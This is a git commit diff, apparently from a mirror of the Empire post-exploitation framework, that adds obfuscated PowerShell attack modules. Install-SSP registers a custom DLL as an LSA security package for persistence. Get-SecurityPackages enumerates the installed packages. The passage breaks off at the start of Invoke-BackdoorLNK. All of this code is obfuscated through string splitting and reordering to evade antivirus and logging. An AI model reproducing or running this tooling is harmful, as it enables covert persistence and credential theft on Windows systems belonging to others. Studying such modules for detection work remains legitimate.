infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Implement Obfuscation

mdns
cobbr 2017-03-11 17:35:17 -06:00
parent 98f30d55d5
commit ab1b3e5f3f
317 changed files with 39772 additions and 894 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitignore vendored
View File

@ -6,3 +6,6 @@ downloads/*
.vscode/*
*.txt
LastTask*
data/obfuscated_module_source/*.ps1
data/misc/ToObfuscate.ps1
data/misc/Obfuscated.ps1

2
data/module_source/collection/Invoke-NetRipper.ps1
View File

@ -108,7 +108,7 @@ function Invoke-NetRipper {
{
throw("Could not find string $FindString !")
}
Write-Verbose "[*] Pattern found at $index: $FindString"
Write-Verbose "[*] Pattern found at $index : $FindString"
Write-Verbose "[*] Replacing with pattern: $ReplaceString"
for ($i=0; $i -lt $ReplaceStringBytes.Length; $i++)

1
data/obfuscated_module_source/code_execution/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/collection/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/collection/vaults/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/credentials/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/exfil/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/exploitation/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/fun/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/lateral_movement/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/management/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/persistance/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

114
data/obfuscated_module_source/persistence/Get-SecurityPackages.ps1 Normal file
View File

@ -0,0 +1,114 @@
.("{0}{1}{2}" -f'SET-i','T','eM') ('VAR'+'ia'+'BlE:K8'+'s'+'i') ( [TYPE]("{1}{0}" -F'PpdOmaIN','A') );$Ujc7T = [tYPe]("{3}{4}{2}{0}{1}{6}{5}" -f'ctIOn.emIt.As','SEM','LE','r','ef','Ss','blyBuILdeRACCe'); $oat0D = [typE]("{2}{0}{1}{3}" -F'GSaT','tRI','fLA','buTE') ;.("{0}{2}{1}" -f 'sE','-iTeM','t') ("varIabLe"+":t47"+"w") ([TypE]("{4}{3}{1}{5}{2}{0}{6}" -f'sI','.eMiT.PA','Ing','TIon','Reflec','Ck','ZE') );&("{0}{1}{2}" -f 'S','ET-Ite','m') ("va"+"rIABle:bv"+"7t"+"e") ( [TYPe]("{5}{2}{8}{4}{1}{3}{7}{6}{0}"-f'ONS','On.CallINgc','EFLEC','OnveN','i','r','i','t','t') ); .("{2}{0}{1}" -f 'iab','LE','set-VAr') Tbc2 ([Type]("{0}{1}"-F'INt3','2') ); $rv1= [tYpE]("{5}{9}{2}{8}{7}{3}{6}{4}{1}{0}" -F 'IOn','T','ImE.iNTerOP','lliN','En','Ru','gCOnV','Ca','SeRViCeS.','nT'); $FKa = [type]("{0}{6}{2}{4}{5}{3}{1}"-f'rUNt','HArSEt','NTe','ES.C','ROP','sErviC','iMe.I') ; $96lwu = [tyPE]("{2}{0}{1}"-f 'pt','R','INT') ; $7LO = [TypE]("{0}{5}{1}{2}{6}{4}{3}"-F 'RuNTim','teR','oPseRv','s.MarsHaL','e','E.iN','IC') ;function gE`T-SEcUR`I`TYPA`CKageS
{
[CmdletBinding()] Param()
${D`YN`ASSemBLY} = .("{3}{2}{0}{1}" -f'e','ct','j','New-Ob') ("{2}{4}{3}{1}{0}" -f'yName','mbl','S','.Reflection.Asse','ystem')(("{1}{0}" -f'PI','SS'))
${as`sEMb`lyBuI`LDeR} = $K8SI::"CurR`E`NTDO`MaiN".("{1}{3}{4}{0}{2}"-f'A','De','ssembly','fineDynami','c').Invoke(${Dyn`ASS`em`BlY}, $uJC7T::"R`un")
${m`Od`u`le`BUIlDER} = ${ASsEMBLyB`u`i`L`DER}.("{6}{0}{3}{5}{4}{1}{2}" -f'e','namicModu','le','f','neDy','i','D').Invoke(("{1}{0}" -f'PI','SS'), ${Fa`l`sE})
${flAGsc`OnStru`C`TOR} = ( .("{1}{0}"-f'ir','d') vAriAblE:OAT0D)."v`AlUe".("{3}{0}{1}{2}" -f'tCo','n','structor','Ge').Invoke(@())
${F`L`AG`sCuSt`oMaTtRi`ButE} = &("{1}{0}{2}{3}" -f'j','New-Ob','ec','t') ("{0}{6}{4}{3}{1}{2}{5}{7}"-f 'Refle','stomA','ttributeBu','it.Cu','on.Em','ilde','cti','r')(${FLAg`sC`o`N`StRuCT`OR}, @())
${sTr`UcTATTRiB`ut`Es} = ("{8}{18}{9}{1}{14}{7}{4}{2}{16}{5}{6}{12}{17}{3}{11}{10}{0}{13}{15}"-f'ldI','o','Class, Pub','led, Befor','lass, ','tialLayout',',','C','A','toLay','Fie','e',' Se','n','ut, Ansi','it','lic, Sequen','a','u')
${enUM`B`ui`LDER} = ${m`odUlE`BUI`L`dER}.("{0}{2}{1}"-f'Define','um','En').Invoke(("{1}{3}{0}{2}"-f'PK','SSPI','G_FLAG','.SEC'), ("{1}{0}" -f'lic','Pub'), [Int32])
${eN`U`mb`UIldEr}.("{0}{1}{3}{2}" -f'Se','tCusto','Attribute','m').Invoke(${fLAG`ScuStO`M`AttriBU`TE})
${N`ULL} = ${enum`BUI`LDer}.("{2}{0}{3}{1}" -f 'neLiter','l','Defi','a').Invoke(("{2}{1}{0}" -f 'Y','GRIT','INTE'), 1)
${N`ULl} = ${eNu`m`BUi`lDEr}.("{0}{2}{1}" -f'Define','teral','Li').Invoke(("{0}{2}{1}"-f'PR','CY','IVA'), 2)
${nu`LL} = ${eNUMbU`I`l`dEr}.("{1}{0}{3}{2}{4}"-f'ineLit','Def','ra','e','l').Invoke(("{1}{0}{2}"-f 'N','TOKE','_ONLY'), 4)
${N`ull} = ${EN`uM`BUil`dER}.("{0}{1}{2}" -f'Defin','eLiter','al').Invoke(("{1}{0}{2}" -f'ATA','D','GRAM'), 8)
${Nu`ll} = ${eN`UmBU`IldER}.("{3}{2}{4}{0}{1}" -f 'a','l','Li','Define','ter').Invoke(("{2}{1}{0}" -f 'N','NNECTIO','CO'), 0x10)
${nU`ll} = ${enum`B`u`ILDER}.("{0}{2}{1}"-f'Defin','al','eLiter').Invoke(("{4}{2}{0}{1}{3}" -f 'R','EQ','ULTI_','UIRED','M'), 0x20)
${N`UlL} = ${e`NU`MBui`LDEr}.("{3}{2}{0}{1}"-f 'eLiter','al','n','Defi').Invoke(("{0}{1}{2}"-f 'CLIEN','T_O','NLY'), 0x40)
${nU`lL} = ${E`NUMBuilD`eR}.("{0}{1}{2}"-f'De','f','ineLiteral').Invoke(("{1}{3}{0}{2}" -f'DED_ER','EX','ROR','TEN'), 0x80)
${n`Ull} = ${En`Umbu`I`ldeR}.("{2}{1}{0}{3}"-f 'e','fineLit','De','ral').Invoke(("{1}{2}{0}" -f 'ON','IM','PERSONATI'), 0x100)
${N`ulL} = ${ENUm`B`uIlDEr}.("{2}{0}{3}{1}" -f 'fineLi','al','De','ter').Invoke(("{1}{3}{4}{0}{2}" -f'_N','A','AME','CCEPT_WI','N32'), 0x200)
${n`uLl} = ${E`NuMB`UI`LDEr}.("{3}{2}{0}{1}"-f 'eLi','teral','fin','De').Invoke(("{0}{1}" -f 'STREA','M'), 0x400)
${n`ulL} = ${E`NumbUIld`er}.("{1}{2}{3}{0}"-f'teral','D','efi','neLi').Invoke(("{1}{2}{0}"-f'IABLE','N','EGOT'), 0x800)
${nU`ll} = ${E`Nu`mBU`ildEr}.("{0}{1}{2}" -f 'Defin','eLiter','al').Invoke(("{0}{1}{3}{2}" -f'GSS','_COMPAT','BLE','I'), 0x1000)
${nu`ll} = ${EN`UMBuil`d`ER}.("{2}{1}{0}" -f 'eral','Lit','Define').Invoke(("{0}{1}"-f'LO','GON'), 0x2000)
${nu`LL} = ${en`UMBU`IldER}.("{0}{1}{2}"-f 'Defi','neLitera','l').Invoke(("{0}{2}{1}"-f'A','II_BUFFERS','SC'), 0x4000)
${n`uLL} = ${EnU`M`BuILD`ER}.("{2}{0}{1}"-f'itera','l','DefineL').Invoke(("{1}{2}{0}"-f'MENT','F','RAG'), 0x8000)
${N`uLL} = ${EnUM`Bui`L`DER}.("{0}{2}{1}"-f 'Defi','eral','neLit').Invoke(("{0}{1}{2}" -f 'MU','TUAL_','AUTH'), 0x10000)
${NU`ll} = ${eN`umBu`iLd`er}.("{2}{0}{1}" -f 'era','l','DefineLit').Invoke(("{1}{2}{0}" -f'N','DELEG','ATIO'), 0x20000)
${Nu`ll} = ${e`NU`mBuiL`Der}.("{1}{0}{2}"-f 'fine','De','Literal').Invoke(("{4}{2}{3}{1}{0}"-f'KSUM','ITH_CHEC','ONLY_','W','READ'), 0x40000)
${n`ull} = ${e`Num`BUilDer}.("{0}{3}{2}{1}{4}"-f 'D','era','eLit','efin','l').Invoke(("{2}{1}{0}{3}" -f 'T','RICTED_','REST','OKENS'), 0x80000)
${Nu`lL} = ${E`NUM`BUiLd`Er}.("{3}{1}{2}{4}{0}" -f 'eral','f','ineL','De','it').Invoke(("{0}{2}{4}{3}{1}"-f 'N','DER','EG','EXTEN','O_'), 0x100000)
${NU`Ll} = ${enUM`B`uiLd`ER}.("{2}{0}{1}" -f 'L','iteral','Define').Invoke(("{1}{2}{0}" -f 'GOTIABLE2','N','E'), 0x200000)
${n`ULL} = ${E`NUM`BUi`LdEr}.("{0}{2}{1}" -f 'De','ral','fineLite').Invoke(("{4}{0}{2}{1}{3}" -f 'ER','STHRO','_PAS','UGH','APPCONTAIN'), 0x400000)
${n`ull} = ${ENum`BUILD`eR}.("{0}{3}{1}{4}{2}"-f 'De','in','Literal','f','e').Invoke(("{4}{5}{2}{0}{1}{3}" -f'NER_C','HEC','NTAI','KS','AP','PCO'), 0x800000)
${S`eCP`kg_FlAG} = ${E`NU`MB`UILdeR}.("{2}{1}{0}"-f'ype','teT','Crea').Invoke()
${tYP`EBuILD`eR} = ${mOdUl`eB`ui`lDEr}.("{2}{1}{0}" -f'pe','y','DefineT').Invoke(("{2}{1}{3}{4}{0}"-f 'kgInfo','SPI.','S','Se','cP'), ${STrUc`TAT`T`Rib`UTEs}, [Object], $T47w::"s`iZe8")
${N`ULL} = ${Ty`PEbu`iL`DeR}.("{2}{0}{3}{1}"-f 'i','d','DefineF','el').Invoke(("{1}{2}{0}{3}" -f'iti','fCap','abil','es'), ${Secp`kG_`Fl`AG}, ("{1}{0}"-f'ic','Publ'))
${n`uLL} = ${typ`EBUil`der}.("{0}{3}{1}{2}"-f 'Defi','eF','ield','n').Invoke(("{1}{2}{0}" -f 'ersion','w','V'), [Int16], ("{2}{1}{0}" -f'c','bli','Pu'))
${N`ULL} = ${TYpEbu`I`LdER}.("{2}{0}{1}" -f'Fiel','d','Define').Invoke(("{1}{0}" -f'RPCID','w'), [Int16], ("{0}{2}{1}" -f 'Publ','c','i'))
${n`ull} = ${tyPe`B`uiLd`er}.("{2}{1}{0}" -f'd','fineFiel','De').Invoke(("{2}{0}{1}"-f 'xTo','ken','cbMa'), [Int32], ("{1}{0}" -f 'c','Publi'))
${n`ULl} = ${TyPEbu`ILd`Er}.("{2}{1}{0}" -f 'Field','fine','De').Invoke(("{0}{1}"-f'Na','me'), [IntPtr], ("{0}{1}"-f'Pub','lic'))
${Nu`LL} = ${TYpEBU`i`lDer}.("{0}{1}{3}{2}" -f'DefineFi','e','d','l').Invoke(("{1}{0}{2}"-f 'omm','C','ent'), [IntPtr], ("{0}{1}"-f'P','ublic'))
${s`ecPk`GiN`Fo} = ${TyP`E`B`UILdeR}.("{3}{2}{1}{0}"-f'pe','eTy','reat','C').Invoke()
${Ty`PE`BuiLDeR} = ${MoD`uL`Eb`UiLd`er}.("{0}{2}{1}" -f 'D','pe','efineTy').Invoke(("{3}{2}{0}{1}"-f '.','Secur32','SPI','S'), ("{2}{0}{1}"-f 'blic, C','lass','Pu'))
${p`InvOKE`mETh`od} = ${T`yP`EbUilD`Er}.("{0}{4}{2}{1}{3}" -f 'Defi','okeMetho','PInv','d','ne').Invoke(("{1}{3}{4}{2}{0}" -f'ges','EnumerateS','yPacka','ecu','rit'),
("{1}{0}{3}{2}"-f 'e','s','dll','cur32.'),
("{0}{3}{1}{2}"-f 'Public','tat','ic',', S'),
( &("{0}{2}{1}"-f'gET-','IABLE','VAR') ("b"+"V7te") )."Val`UE"::"Sta`NDARD",
[Int32],
[Type[]] @( $TBC2.("{2}{0}{1}" -f 'ByRef','Type','Make').Invoke(),
$96LWU.("{3}{1}{2}{4}{0}"-f'pe','eBy','Re','Mak','fTy').Invoke()),
(&("{1}{2}{0}" -f 'E','vAriaB','L') rv1 -vaLu )::"W`INa`Pi",
( &("{1}{0}" -f'bLe','vaRIa') ('FK'+'A') )."V`Alue"::"A`NSi")
${sec`u`R32} = ${ty`P`EBUi`lDer}.("{0}{2}{1}{3}" -f 'Cr','t','ea','eType').Invoke()
${pAc`ka`g`ecounT} = 0
${pA`ckAgearRAy`P`Tr} = ( .('LS') vArIAblE:96lWU )."Val`UE"::"Ze`RO"
${rE`SUlt} = ${Se`cur`32}::"EnuM`E`R`AtES`eCurIty`packa`g`ES"([Ref] ${P`ACKA`GE`cOUnT}, [Ref] ${pAC`KaG`eA`RraY`PTr})
if (${rE`Su`lT} -ne 0)
{
throw "Unable to enumerate seucrity packages. Error (0x$($Result.ToString('X8'))) "
}
if (${P`AC`K`AGEcounT} -eq 0)
{
.("{2}{0}{3}{4}{1}"-f'it','se','Wr','e-Ver','bo') ("{6}{3}{10}{2}{11}{9}{12}{5}{0}{8}{4}{7}{1}" -f'ed ',' packages.','e are n','h','u','l','T','rity','sec',' i','er','o','nstal')
return
}
${S`TRUCTAD`D`RE`SS} = ${PAc`kAgeArr`AY`PtR}
foreach (${i} in 1..${paCk`Ag`ECOuNt})
{
${sECPAcK`AG`E`StRu`Ct} = ( .("{2}{0}{1}" -f'iT','EM','get-') VaRIablE:7lo)."V`AlUe"::"PT`RTO`S`TrUCT`Ure"(${St`RUct`AdDr`eSs}, [Type] ${Se`C`P`kgInFO})
${stru`CTa`DDreSs} = [IntPtr] (${sTr`uCTADD`Re`ss}.("{1}{0}"-f'oInt64','T').Invoke() + ( &("{0}{1}{2}"-f'VA','riA','bLe') 7lO -va )::"s`iZe`oF"([Type] ${seCPkg`IN`FO}))
${NA`mE} = ${nU`Ll}
if (${se`C`paCkA`ges`Tru`cT}."nA`ME" -ne $96Lwu::"z`eRo")
{
${N`Ame} = ( .("{0}{1}"-f 'IT','eM') ('vARiAB'+'LE:'+'7lO') )."V`AlUE"::("{0}{1}{4}{2}{3}" -f'P','trT','tringAn','si','oS').Invoke(${s`E`cP`Ac`KAgeSTrUCt}."N`AME")
}
${co`MM`ENT} = ${NU`LL}
if (${SECp`A`CkaGeStr`u`ct}."co`mMEnT" -ne $96LWu::"Z`ERO")
{
${com`me`NT} = $7LO::("{1}{3}{2}{0}"-f 'Ansi','P','ing','trToStr').Invoke(${sE`CP`Ac`KA`gEsTrUcT}."Co`mmeNt")
}
${a`TTRIB`ut`eS} = @{
("{0}{1}" -f'Na','me') = ${N`Ame}
("{1}{2}{0}" -f 't','C','ommen') = ${c`oMM`ENT}
("{1}{3}{2}{0}" -f 'es','Capa','liti','bi') = ${sE`CpaCKagEsT`R`UCT}."fc`A`pabILI`TIEs"
("{1}{0}{2}{3}"-f 'xTok','Ma','enS','ize') = ${sEcP`Ack`AgE`S`T`RucT}."cBM`AxTO`KEn"
}
${s`Ecp`ACkaGE} = &("{0}{1}{2}" -f'New-','Obje','ct') ("{0}{1}"-f 'PS','Object') -Property ${A`T`TrIbu`Tes}
${seC`PAcKa`gE}."ps`OB`JECt"."T`yPeNam`Es"[0] = ("{1}{4}{2}{3}{0}"-f 'O','SECUR','CP','KGINF','32.SE')
${s`ECP`AC`kAGe}
}
}

171
data/obfuscated_module_source/persistence/Install-SSP.ps1 Normal file
View File

@ -0,0 +1,171 @@
$y9m = [type]("{8}{1}{6}{5}{4}{0}{3}{7}{2}"-f'wSIdE','RiTY.','ITY','N','O','PAl.wInD','PRiNCI','t','SEcU') ; $UCqP = [TYPE]("{2}{5}{1}{6}{3}{7}{4}{0}" -f'InROLe','UR','S','.PRInCipaL.wiNDOw','t','ec','ITY','sbuil') ; SV vdEG5W ( [tYPE]("{3}{2}{1}{4}{0}{5}" -F 'FILEm','TeM.i','ys','s','o.','oDE') ) ; $1OKHFz =[tYpE]("{3}{0}{2}{1}" -F 't','.FILeACCEss','Em.iO','SYs') ;$9j3= [tyPE]("{2}{1}{0}{4}{3}"-F 'SCi','T.A','sYSTEM.tEX','ENcOdInG','I') ;$plZTk4 = [type]("{2}{5}{0}{4}{3}{1}"-F'.SeEkoRI','N','Sy','i','g','StEm.IO') ; sEt-ItEm VarIABle:UHmc0o ( [tYpE]("{2}{3}{0}{1}"-f 'omA','In','aP','pD') ) ; set ("D"+"5F") ( [TYpE]("{8}{0}{7}{9}{3}{2}{6}{5}{1}{4}" -F'n.','c','U','Lyb','ess','DERAC','iL','eMIt.AsSE','rEflecTIO','mB') ) ; Set-ITeM vAriABLe:Ku87 ( [tyPe]("{2}{5}{4}{0}{1}{6}{3}"-f'Lli','Ng','REfle','NTioNs','N.CA','CTio','coNVE') ) ; sEt-itEm vaRIaBLe:KvYz ([type]("{7}{6}{12}{0}{4}{1}{5}{10}{2}{8}{9}{3}{11}" -f 'T','RoPS','ces.','Io','E','ERV','T','run','CALLiNGCO','nVeNt','i','n','IME.In') ) ; sEt-VaRiabLe ('2'+'43') ([tYpE]("{5}{3}{7}{0}{2}{4}{8}{1}{6}"-F'.INT','es.ChaRSE','erO','unt','PServI','R','t','Ime','C') ) ; set-variablE ('pDZ'+'83') ([tyPE]("{0}{1}"-F 'iN','TPtr') ) ; $819 =[TYPe]("{0}{5}{1}{7}{4}{3}{6}{2}"-F 'run','Me','L','rOPsERV','e','TI','IceS.mArSHa','.int') ;function in`stalL-`sSP
{
[CmdletBinding()] Param (
[ValidateScript({.("{2}{1}{0}" -f '-Path','st','Te') (&("{1}{2}{0}" -f'th','Res','olve-Pa') ${_})})]
[String]
${PA`TH}
)
${pri`N`cIpAL} = [Security.Principal.WindowsPrincipal] $Y9m::("{2}{1}{0}"-f 'nt','re','GetCur').Invoke()
if(-not ${PRiN`Ci`PaL}."IsINr`o`le"( $ucqp::"Ad`min`i`stRAtOr"))
{
throw ("{9}{17}{14}{1}{20}{5}{8}{4}{22}{11}{3}{18}{15}{13}{21}{10}{6}{7}{19}{16}{0}{2}{12}"-f 'promp','SSP dl','t','ve rights. E',' a','re','va','ted Power','s','I','e','rati','.',' script from','ling an ','this','hell ','nstal','xecute ','S','l requi',' an el','dminist')
}
${f`uLlDL`LpAth} = .("{2}{1}{3}{0}" -f 'th','solve','Re','-Pa') ${Pa`Th}
function LoC`AL:`g`E`T-peArc`hiTeC`TU`Re
{
Param
(
[Parameter( poSiTION = 0,
manDATOry = ${tr`UE} )]
[String]
${P`ATh}
)
${f`IL`ESTr`eAm} = .("{0}{2}{1}{3}" -f 'N','-Ob','ew','ject') ("{3}{0}{1}{2}{4}" -f 'e','m.IO.File','St','Syst','ream')(${p`ATh}, ( Ls VaRIAble:vDEg5w).VaLUe::"op`EN", ( vArIaBLE ("1ok"+"h"+"fZ") ).vALuE::"r`eAd")
[Byte[]] ${mz`hE`ADeR} = &("{1}{0}{2}" -f 'w-O','Ne','bject') ("{0}{1}" -f 'Byte','[]')(2)
${f`i`Les`TREAm}.("{0}{1}"-f'R','ead').Invoke(${MzheA`d`ER},0,2) | .("{0}{2}{1}" -f 'Out','Null','-')
${Hea`DEr} = (gET-chiLDiTEm ("VaRi"+"abLe:9J"+"3") ).vAlUE::"AsC`ii".("{0}{1}" -f'Ge','tString').Invoke(${Mz`h`eADEr})
if (${h`eA`der} -ne 'MZ')
{
${Filest`R`e`Am}.("{0}{1}" -f'Cl','ose').Invoke()
Throw ("{0}{3}{5}{4}{1}{2}"-f 'I',' hea','der.','nv',' PE','alid')
}
${fIL`EStrE`Am}."SE`EK"(0x3c, (gI variabLe:PLZTK4).vaLUe::"b`eGin") | .("{0}{2}{1}"-f'Ou','Null','t-')
[Byte[]] ${l`Fan`Ew} = &("{2}{3}{1}{0}"-f'bject','-O','Ne','w') ("{0}{1}"-f'B','yte[]')(4)
${F`IlES`TrEAM}.("{1}{0}" -f'ead','R').Invoke(${L`Fa`NEw},0,4) | &("{0}{1}"-f'Out-Nul','l')
${PEoF`FsEt} = [Int] ('0x{0}' -f (( ${L`F`ANEw}[-1..-4] | .('%') { ${_}.("{0}{1}" -f'To','String').Invoke('X2') } ) -join ''))
${FILES`T`RE`Am}."sE`eK"(${pE`of`FseT} + 4, ( get-vARiaBLE ("Plz"+"tk4")).vaLue::"Beg`iN") | &("{0}{2}{1}" -f 'O','l','ut-Nul')
[Byte[]] ${IM`AGE`_Fi`Le`_mAchiNe} = &("{1}{2}{0}" -f't','New-O','bjec') ("{1}{0}"-f'[]','Byte')(2)
${Fi`LesTR`e`AM}.("{1}{0}"-f 'ead','R').Invoke(${Im`A`ge_F`iLE_Mac`hine},0,2) | .("{1}{2}{0}" -f'-Null','O','ut')
${arcHITe`c`T`uRe} = '{0}' -f (( ${IMA`GE_fiLe_`m`AchinE}[-1..-2] | &('%') { ${_}.("{2}{0}{1}" -f'o','String','T').Invoke('X2') } ) -join '')
${filEsTr`E`Am}.("{0}{1}"-f 'Cl','ose').Invoke()
if ((${arc`hiTECt`URE} -ne ("{1}{0}" -f '4C','01')) -and (${ArC`hIT`eCt`UrE} -ne ("{1}{0}" -f '4','866')))
{
Throw ("{1}{9}{5}{3}{6}{0}{11}{7}{4}{10}{8}{2}" -f 'upporte','Invalid PE','.',' un','tu','or','s',' architec','e',' header ','r','d')
}
if (${A`Rc`hiTe`C`TURE} -eq ("{1}{0}" -f'14C','0'))
{
&("{1}{2}{3}{0}"-f'put','Writ','e','-Out') ("{2}{1}{0}" -f 't','2-bi','3')
}
elseif (${aRcHI`TEc`Ture} -eq ("{0}{1}" -f'866','4'))
{
.("{0}{1}{2}" -f 'Wr','ite-Out','put') ("{1}{0}"-f '4-bit','6')
}
else
{
&("{2}{1}{0}" -f 't','Outpu','Write-') ("{1}{0}" -f 'r','Othe')
}
}
${dLl`ArchiTe`C`TuRE} = &("{1}{0}{3}{2}"-f't-P','Ge','hitecture','EArc') ${F`u`l`ldLLpATH}
${o`sar`ch} = &("{1}{0}{2}{3}"-f 'et-W','G','miObj','ect') ("{0}{2}{1}{3}{5}{4}" -f 'Wi','p','n32_O','erati','m','ngSyste') | .("{0}{2}{1}" -f 'Select','t','-Objec') -ExpandProperty ("{0}{1}{2}{4}{3}" -f'O','S','Arc','cture','hite')
if (${DLl`ARC`hI`TECTUre} -ne ${Os`AR`cH})
{
throw ("{18}{14}{6}{20}{12}{1}{15}{21}{10}{13}{4}{8}{9}{5}{2}{17}{3}{11}{7}{16}{22}{0}{19}"-f'dl','era','m',' ','i','e must ',' ','tecture of','tect','ur','rc','archi','p','h','he','ting system ',' the S','atch the','T','l.','o','a','SP ')
}
${d`Ll} = &("{0}{2}{1}" -f'Get-I','em','t') ${fUlld`ll`P`ATH} | .("{0}{2}{1}{3}"-f 'S','t-Objec','elec','t') -ExpandProperty ("{0}{1}"-f 'Na','me')
${D`Ll`NamE} = ${d`ll} | &('%') { &('%') {(${_} -split '\.')[0]} }
${S`e`cURityP`Ac`K`AgeS} = .("{2}{1}{3}{0}"-f'y','Item','Get-','Propert') (("{2}{8}{4}{13}{3}{9}{11}{14}{12}{10}{7}{0}{6}{1}{5}" -f'HCo','8HLs','HKL','STEM','38H','a','ntrol3','38','M:','38HCur','et','rentC','ntrolS','SY','o'))."REPL`ACe"(([chaR]51+[chaR]56+[chaR]72),'\') -Name ("{0}{2}{3}{1}"-f 'Secu','s','rity ','Package') |
&("{2}{1}{3}{0}"-f't','t','Selec','-Objec') -ExpandProperty ("{2}{0}{1}{3}" -f 'rity',' Package','Secu','s')
if (${S`e`CuRi`TYpackAgES} -contains ${DL`Ln`AmE})
{
throw ("'$DllName' "+'i'+'s '+'al'+'r'+'eady '+'present'+' '+'in'+' '+('HKLM:{0}SYS'+'TEM{0'+'}Cu'+'rrentCon'+'tr'+'olS'+'e'+'t{0'+'}Contro'+'l{'+'0'+'}'+'Lsa{0}'+'Secu'+'rity ')-f [char]92+'Pack'+'ag'+'es.')
}
${NAT`IV`e`iNsTAlLdIR} = "$($Env:windir)\Sysnative"
if (.("{0}{2}{1}" -f'Test-','ath','P') ${NAtIV`EIN`s`TalLd`IR})
{
${I`NSTALl`dIR} = ${n`A`Ti`V`EIn`STALLdIr}
}
else
{
${i`N`StALl`diR} = "$($Env:windir)\System32"
}
if (&("{0}{1}{2}" -f 'Tes','t-','Path') (&("{2}{1}{3}{0}" -f'h','in-','Jo','Pat') ${In`stalL`DIR} ${d`LL}))
{
throw ("$Dll "+'is'+' '+'alre'+'ady'+' '+'in'+'s'+'t'+'alled '+'in'+' '+"$InstallDir.")
}
.("{0}{2}{1}"-f 'Copy-','tem','I') ${F`UL`LdllpA`TH} ${i`Nsta`LLdIr}
${s`eCUrI`T`yPaCK`A`gEs} += ${DLL`Na`me}
.("{0}{2}{1}{3}"-f'Set-It','mPr','e','operty') ((("{15}{11}{3}{7}{8}{10}{13}{4}{0}{5}{6}{12}{2}{1}{9}{14}"-f 'Con','rol','t','{','ent','t','rolSet{0}','0','}S','{0}L','YSTEM{0}C','LM:','Con','urr','sa','HK')) -F [ChAr]92) -Name ("{3}{0}{2}{1}{4}" -f 'cu','ty Package','ri','Se','s') -Value ${SEcURI`TY`P`Ackag`eS}
${D`YnasS`E`MbLY} = .("{2}{0}{1}{3}"-f'bj','e','New-O','ct') ("{2}{5}{1}{0}{4}{3}{7}{6}"-f 'n.Ass','o','Sys','blyN','em','tem.Reflecti','me','a')(("{1}{0}" -f 'PI2','SS'))
${As`sE`MbLYB`UiLdeR} = $UHMc0o::"CU`RReN`T`Do`main"."d`EfI`NEdYnamIca`s`sEMbly"(${dYN`A`sSeMbly}, $D5F::"r`un")
${mo`Du`Le`Bu`ilDer} = ${asSe`MB`LYbu`iLD`ER}.("{2}{3}{0}{1}{4}" -f'M','odu','Defin','eDynamic','le').Invoke(("{0}{1}"-f'SS','PI2'), ${F`ALSe})
${T`yPebUI`L`der} = ${mO`DUlebUiL`deR}.("{0}{2}{1}" -f'Def','pe','ineTy').Invoke(("{1}{0}{2}"-f 'PI2.Sec','SS','ur32'), ("{2}{0}{1}" -f'blic, ','Class','Pu'))
${piN`VO`Kem`etHod} = ${TY`PEBuI`ldER}.("{2}{5}{4}{1}{3}{0}"-f'd','ok','Defin','eMetho','v','ePIn').Invoke(("{4}{2}{1}{3}{0}" -f 'age','ri','Secu','tyPack','Add'),
("{1}{2}{0}" -f 'dll','sec','ur32.'),
("{3}{1}{2}{0}" -f'c','Sta','ti','Public, '),
$KU87::"s`TanDa`RD",
[Int32],
[Type[]] @([String], [IntPtr]),
$kVYz::"WinA`pI",
$243::"au`TO")
${SE`CuR`32} = ${ty`pEBu`iLD`er}.("{2}{1}{0}" -f 'pe','ateTy','Cre').Invoke()
if ( (VaRiABle ('pDz'+'83') ).vALue::"s`IzE" -eq 4) {
${StRuc`T`SIzE} = 20
} else {
${s`TRu`cTSI`ZE} = 24
}
${s`Tru`cTPTr} = (Dir ("V"+"a"+"RIAblE:81"+"9") ).vAlUE::("{1}{2}{0}" -f 'Global','A','llocH').Invoke(${sT`RuCt`Si`ZE})
(GI vaRIAbLe:819 ).VaLUe::("{1}{2}{0}"-f 'nt32','Wri','teI').Invoke(${s`T`RUcTpTR}, ${STruct`S`Ize})
${runTiME`Suc`CESS} = ${Tr`ue}
try {
${res`Ult} = ${Se`cuR`32}::("{0}{2}{1}{3}"-f 'AddS','rityPack','ecu','age').Invoke(${Dl`Ln`AmE}, ${st`RUct`PTR})
} catch {
${hRE`S`uLT} = ${ER`ROr}[0]."exC`epT`iON"."iNNER`ExceP`Ti`On"."hREs`U`lT"
&("{2}{1}{0}{3}"-f'in','Warn','Write-','g') "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8'))) "
.("{4}{1}{3}{0}{2}"-f 'rni','W','ng','a','Write-') "Reason: $(([ComponentModel.Win32Exception] $HResult).Message) "
${ru`NTI`mesUccess} = ${f`AlsE}
}
if (${RuNtIMES`Ucc`ess}) {
.("{1}{0}{3}{2}" -f'r','W','e-Verbose','it') ("{2}{3}{0}{6}{8}{1}{7}{5}{4}" -f 'll','oa','In','sta','mplete!','co','ation an','ding ','d l')
} else {
.("{1}{3}{0}{2}"-f 'e-Verbos','W','e','rit') ("{5}{1}{3}{9}{6}{7}{2}{0}{8}{4}"-f 'take eff','nstal','to ','l','.','I','n complete! Reboot for ','changes ','ect','atio')
}
}

76
data/obfuscated_module_source/persistence/Invoke-BackdoorLNK.ps1 Normal file
View File

@ -0,0 +1,76 @@
Set-VarIabLe ("{1}{0}"-f 'OSWH','9') ( [TyPE]("{0}{2}{4}{3}{1}"-f'SY','ODiNg','StEm','.eNC','.tExt')) ; SeT-iTEm ("VARIabL"+"E"+":2I"+"0") ( [TYPE]("{4}{2}{0}{1}{3}"-F'eM.C','ONV','St','ERt','SY')); function i`NVOK`e-B`ACKdOORLNk {
[CmdletBinding()] Param(
